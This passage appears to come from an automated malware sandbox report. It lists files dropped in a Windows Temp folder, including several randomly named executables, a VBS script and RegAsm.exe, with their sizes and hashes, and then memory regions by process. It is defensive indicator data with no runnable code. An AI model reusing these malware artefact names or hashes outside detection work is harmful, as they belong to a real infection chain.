                                      SHA1

                                      af2f9db558e5c979839af7fc54a9c6f4c5f1945c

                                      SHA256

                                      ebf04432efd04f6cef2c51164bb25c78867f0c8f7e361653408f74e7b5e1f2f6

                                      SHA512

                                      ee2d9b78696a6fcbb018ea46a8125edea4d3df76c604290d8ecc6586e9dbf15e8d14e09fdcb124fc235d47d1736e9995ec7501d101541a091b3d208efa695e91

                                    • C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe

                                      Filesize

                                      159KB

                                      MD5

                                      36beea554789233179f8275b85035d42

                                      SHA1

                                      f4bd79044a32adb1b678aaec13eda99d9f169215

                                      SHA256

                                      df5311f9bb283913fd5295202df47050893b8ed4f29b1801e1720f5443e87163

                                      SHA512

                                      f8868aa5609787a5222d393848ee8fdb2551691470c6f0e0f30242660c048f6ed7306aa4c46c6b0f359800b422c056fbb1f66fe750effd3a7c47fff7394de49d

                                    • C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe

                                      Filesize

                                      1.3MB

                                      MD5

                                      81791c3bf6c8d01341e77960eafc2636

                                      SHA1

                                      3a9e164448717ced3d66354f17d3bcba9689c297

                                      SHA256

                                      c1bfa0e9313ea896eba6329eb52b70374df276493468ca30d633f825f91f52a0

                                      SHA512

                                      0629a854e68e3742448447d732a6eb21bcf47dd451552f9699d227fed2733c54a508e4fbfd647c11bee2b5f031bbda0e9f16b5af84c800598a1fe72368aa2f47

                                    • C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe

                                      Filesize

                                      2.0MB

                                      MD5

                                      a62fe491673f0de54e959defbfebd0dd

                                      SHA1

                                      f13d65052656ed323b8b2fca8d90131f564b44dd

                                      SHA256

                                      936d17e301a6f5b6878b1a6f46a215d5af02d8254c65dc64a8679f7b2ff25213

                                      SHA512

                                      4d0ab58f4cd009a48b0bfccc4a3b2163e596db17c5fed2f88b969b752e0704234130377ad7c5488b406a21b51560ec6017609e3f5063771d00a610c2db6f9129

                                    • C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe

                                      Filesize

                                      3.5MB

                                      MD5

                                      45c1abfb717e3ef5223be0bfc51df2de

                                      SHA1

                                      4c074ea54a1749bf1e387f611dea0d940deea803

                                      SHA256

                                      b01d928331e2b87a961b1a5953bc7dbb8d757c250f1343d731e3b6bb20591243

                                      SHA512

                                      3d667f5ada9b62706be003ba42c4390177fc47c82d1d9fa9eaca36e36422e77b894f5ec92ad7a143b7494a5a4b43d6eb8af91cb54e78984bb6e8350df5c34546

                                    • C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe

                                      Filesize

                                      429KB

                                      MD5

                                      d8a7d8e3ffe307714099d74e7ccaac01

                                      SHA1

                                      b0bd0dc5af33f9ee7f3cad3b3b1f3057d706ad77

                                      SHA256

                                      c5b5c385184b5c2d7ed666beb38bb10b703097573f7a6b42b7fdef78acf99c96

                                      SHA512

                                      f46755b7f31d0676f68a97912d031b8354d500ddaed5f60eb10929d861730b5b2d4ba3f67a3141c10d4706c018f58eb42e34e33f70fa90efcabee2ef2cd54631

                                    • C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe

                                      Filesize

                                      350KB

                                      MD5

                                      b60779fb424958088a559fdfd6f535c2

                                      SHA1

                                      bcea427b20d2f55c6372772668c1d6818c7328c9

                                      SHA256

                                      098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

                                      SHA512

                                      c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

                                    • C:\Users\Admin\AppData\Local\Temp\10142360101\3df5e5788d.exe

                                      Filesize

                                      3.1MB

                                      MD5

                                      d06f4c7766ff98b5d1f74adcdb67f59e

                                      SHA1

                                      7ae78558afadad1e79a7d85a24a2c902efa1bd93

                                      SHA256

                                      08f7b98dd6013bacc3cddaf47691bf18efe840b5ce8545cad37d4238c8ccddbe

                                      SHA512

                                      e950199f3a2ed8c8338274af9cf5ca136864c265dcbcdd07b60af6499f8d956f5fbfbd838ec7e16c35b90036de91211cecef304792d1549c748107a995905311

                                    • C:\Users\Admin\AppData\Local\Temp\10142370101\75c1ef65a5.exe

                                      Filesize

                                      1.7MB

                                      MD5

                                      4f4acac62140509f42efdfc374022ecc

                                      SHA1

                                      4355528429bd832850d6b0b705d2f921df25aaf3

                                      SHA256

                                      d0558afb65b1858055af830314b70ab6a7a6c8cb9c8a42b1e8f92a6527ffcb37

                                      SHA512

                                      9f3d9cfe07306a62da480b211e07ffc94f1501edf9983a21481716d51a371028a76eb67f5e8a9afb81cb258d92096664b10f08e6ba7888c87805c5d06a41d34e

                                    • C:\Users\Admin\AppData\Local\Temp\10142380101\775a1069e0.exe

                                      Filesize

                                      948KB

                                      MD5

                                      2404623203ec67daee9fcd3e2d9ae6c2

                                      SHA1

                                      938e96bf32b23e0b49b76989901bebee1a0d8f09

                                      SHA256

                                      f324daf354fb40a2aa99ed674de10cbff8acb09823ff3718503f262388543b87

                                      SHA512

                                      2cc11b3e862fa105304a7b8158927b9cf173dc2430fdd24cb6878b7271e560b7cfdd699f8d26ec41a03374fd030bf84e7d276bf301d904fcd8e24f0cce6aa222

                                    • C:\Users\Admin\AppData\Local\Temp\10142390101\b71d0f89d2.exe

                                      Filesize

                                      2.7MB

                                      MD5

                                      3040c573d9b282545ddc0a81681ae980

                                      SHA1

                                      23e4bfb72ab445c7b12ec1cfc16ca8285adadf5d

                                      SHA256

                                      af1e3b478f4375ae277b788f0c654dff4cde0316124347e2f4646ad7b953242e

                                      SHA512

                                      e683a7f6bb8c0adf317248711e47d5c5787cc899c8b541d0609151da5f22ed0ead3d8fe4d43330d56a0ef0d258a38bafc994b4f0553fcdc414849e287f8a8d5a

                                    • C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe

                                      Filesize

                                      107KB

                                      MD5

                                      74c5934b5ec8a8907aff69552dbaeaf7

                                      SHA1

                                      24c6d4aa5f5b229340aba780320efc02058c059c

                                      SHA256

                                      95930b643e2d7d09d9cdfb2776534744ebb101347bbfe8be84f376fa15d8033a

                                      SHA512

                                      d458c23826d76fecf28ea791a10dda381737d19a1a3a3ba519da6b83f47867f25c51ab34c6cdc73b03b45f6e08bf3bac15172a23847a91d2d76031441859056a

                                    • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe

                                      Filesize

                                      63KB

                                      MD5

                                      b58b926c3574d28d5b7fdd2ca3ec30d5

                                      SHA1

                                      d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

                                      SHA256

                                      6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

                                      SHA512

                                      b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs

                                      Filesize

                                      15KB

                                      MD5

                                      f4966903836111437b1bcb75bcfc19e4

                                      SHA1

                                      c79a7c0271c0e65e1b6211f793ed2264e9431d16

                                      SHA256

                                      572e616fdaa6129d659974b3fee9296c6f75dec475e74dc560a38961926d7621

                                      SHA512

                                      e97ec05627d009edc7c3400505f13235c37e060ca2a9003af3cea8c21e9e2f4e208a6a2bc433a7b0d4b7ff6e5db3005e1c06e56055a8ccfa5b6084f3490b2c60

                                    • C:\Users\Admin\AppData\Local\Temp\TarAC7C.tmp

                                      Filesize

                                      183KB

                                      MD5

                                      109cab5505f5e065b63d01361467a83b

                                      SHA1

                                      4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

                                      SHA256

                                      ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

                                      SHA512

                                      753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                      Filesize

                                      7KB

                                      MD5

                                      61fc0b4ab96db2844c346e94e566cbe0

                                      SHA1

                                      0ccbeea7fe5650632ed6d78939d89fadb71949ee

                                      SHA256

                                      e487dd5903cd80cb1a7d32d52f28b89d89671bf9b8467f1980c339ae33f1dd4a

                                      SHA512

                                      f80734e41c1ea4e9f4df1b2ecd9d72f86b0d70cf6e3042c974cbed23d7a1dfbea1d9e66bc94a9cf518b62a7582c013e11a8951a5172c037ce7a75c958a4cc6d3

                                    • \Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

                                      Filesize

                                      1.8MB

                                      MD5

                                      e74b537fdba9af9c83579432d7107627

                                      SHA1

                                      5127e6d77e38aca75a65f529444f719121b49416

                                      SHA256

                                      fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6

                                      SHA512

                                      2dec46234f2766f7c2ac7a3b958a15724f3d3fe79d3fd19b027755a75dabb8bc338e9f70bf3e4d9387cb1d4df7ffc1b453caf58d65697d4792454b912c5b581d

                                    • memory/824-365-0x0000000001F90000-0x0000000001F98000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/824-364-0x000000001B570000-0x000000001B852000-memory.dmp

                                      Filesize

                                      2.9MB

                                    • memory/848-67-0x0000000001380000-0x00000000016A4000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/936-101-0x0000000000EF0000-0x0000000001907000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/936-139-0x0000000000EF0000-0x0000000001907000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/936-132-0x0000000000EF0000-0x0000000001907000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/936-135-0x0000000000EF0000-0x0000000001907000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/1500-755-0x0000000000A70000-0x0000000000D30000-memory.dmp

                                      Filesize

                                      2.8MB

                                    • memory/1500-756-0x0000000000A70000-0x0000000000D30000-memory.dmp

                                      Filesize

                                      2.8MB

                                    • memory/1600-500-0x00000000010C0000-0x0000000001124000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/1652-111-0x00000000002D0000-0x0000000000492000-memory.dmp

                                      Filesize

                                      1.8MB

                                    • memory/1652-113-0x0000000005920000-0x00000000059D2000-memory.dmp

                                      Filesize

                                      712KB

                                    • memory/1708-235-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1708-236-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/1708-225-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/1708-227-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/1708-231-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/1708-229-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/1708-238-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/1708-233-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/1760-222-0x0000000000290000-0x00000000002F4000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/1780-313-0x0000000000400000-0x000000000042F000-memory.dmp

                                      Filesize

                                      188KB

                                    • memory/2028-81-0x0000000001020000-0x00000000011E2000-memory.dmp

                                      Filesize

                                      1.8MB

                                    • memory/2056-782-0x0000000000400000-0x000000000041E000-memory.dmp

                                      Filesize

                                      120KB

                                    • memory/2060-677-0x0000000000170000-0x00000000001D0000-memory.dmp

                                      Filesize

                                      384KB

                                    • memory/2324-197-0x0000000000CE0000-0x0000000001197000-memory.dmp

                                      Filesize

                                      4.7MB

                                    • memory/2324-130-0x0000000000CE0000-0x0000000001197000-memory.dmp

                                      Filesize

                                      4.7MB

                                    • memory/2336-18-0x00000000073A0000-0x0000000007871000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2336-19-0x00000000073A0000-0x0000000007871000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2336-17-0x0000000000920000-0x0000000000DF1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2336-4-0x0000000000920000-0x0000000000DF1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2336-3-0x0000000000920000-0x0000000000DF1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2336-2-0x0000000000921000-0x000000000094F000-memory.dmp

                                      Filesize

                                      184KB

                                    • memory/2336-1-0x0000000077C40000-0x0000000077C42000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/2336-0-0x0000000000920000-0x0000000000DF1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2444-144-0x0000000010000000-0x000000001001C000-memory.dmp

                                      Filesize

                                      112KB

                                    • memory/2444-138-0x0000000000400000-0x000000000042F000-memory.dmp

                                      Filesize

                                      188KB

                                    • memory/2444-136-0x0000000000400000-0x000000000042F000-memory.dmp

                                      Filesize

                                      188KB

                                    • memory/2468-303-0x0000000001030000-0x0000000001C86000-memory.dmp

                                      Filesize

                                      12.3MB

                                    • memory/2468-312-0x0000000001030000-0x0000000001C86000-memory.dmp

                                      Filesize

                                      12.3MB

                                    • memory/2656-697-0x0000000000400000-0x0000000000429000-memory.dmp

                                      Filesize

                                      164KB

                                    • memory/2656-683-0x0000000000400000-0x0000000000429000-memory.dmp

                                      Filesize

                                      164KB

                                    • memory/2656-679-0x0000000000400000-0x0000000000429000-memory.dmp

                                      Filesize

                                      164KB

                                    • memory/2656-685-0x0000000000400000-0x0000000000429000-memory.dmp

                                      Filesize

                                      164KB

                                    • memory/2656-681-0x0000000000400000-0x0000000000429000-memory.dmp

                                      Filesize

                                      164KB

                                    • memory/2684-651-0x0000000000B70000-0x000000000100A000-memory.dmp

                                      Filesize

                                      4.6MB

                                    • memory/2684-630-0x0000000000B70000-0x000000000100A000-memory.dmp

                                      Filesize

                                      4.6MB

                                    • memory/2720-83-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-128-0x00000000068A0000-0x0000000006D57000-memory.dmp

                                      Filesize

                                      4.7MB

                                    • memory/2720-21-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-301-0x00000000068A0000-0x00000000074F6000-memory.dmp

                                      Filesize

                                      12.3MB

                                    • memory/2720-22-0x0000000000CD1000-0x0000000000CFF000-memory.dmp

                                      Filesize

                                      184KB

                                    • memory/2720-250-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-196-0x00000000068A0000-0x0000000006D57000-memory.dmp

                                      Filesize

                                      4.7MB

                                    • memory/2720-23-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-395-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-203-0x00000000068A0000-0x0000000006D57000-memory.dmp

                                      Filesize

                                      4.7MB

                                    • memory/2720-489-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-204-0x00000000068A0000-0x00000000074F6000-memory.dmp

                                      Filesize

                                      12.3MB

                                    • memory/2720-26-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-25-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-27-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-28-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-29-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-205-0x00000000068A0000-0x00000000074F6000-memory.dmp

                                      Filesize

                                      12.3MB

                                    • memory/2720-531-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-140-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-134-0x00000000068A0000-0x00000000072B7000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/2720-304-0x00000000068A0000-0x00000000074F6000-memory.dmp

                                      Filesize

                                      12.3MB

                                    • memory/2720-129-0x00000000068A0000-0x0000000006D57000-memory.dmp

                                      Filesize

                                      4.7MB

                                    • memory/2720-131-0x00000000068A0000-0x00000000072B7000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/2720-652-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-103-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2720-102-0x00000000068A0000-0x00000000072B7000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/2720-100-0x00000000068A0000-0x00000000072B7000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/2720-84-0x0000000006280000-0x00000000065A4000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2720-82-0x0000000006280000-0x00000000065A4000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2720-60-0x0000000006280000-0x00000000065A4000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2720-61-0x0000000006280000-0x00000000065A4000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2720-45-0x0000000000CD0000-0x00000000011A1000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2752-768-0x0000000000CB0000-0x0000000000CD2000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/2804-300-0x000000001B490000-0x000000001B772000-memory.dmp

                                      Filesize

                                      2.9MB

                                    • memory/2804-302-0x0000000002720000-0x0000000002728000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/2952-509-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/2952-511-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/2952-513-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/2952-514-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/2952-515-0x0000000000400000-0x0000000000464000-memory.dmp

                                      Filesize

                                      400KB

                                    • memory/2972-392-0x0000000000FB0000-0x0000000001172000-memory.dmp

                                      Filesize

                                      1.8MB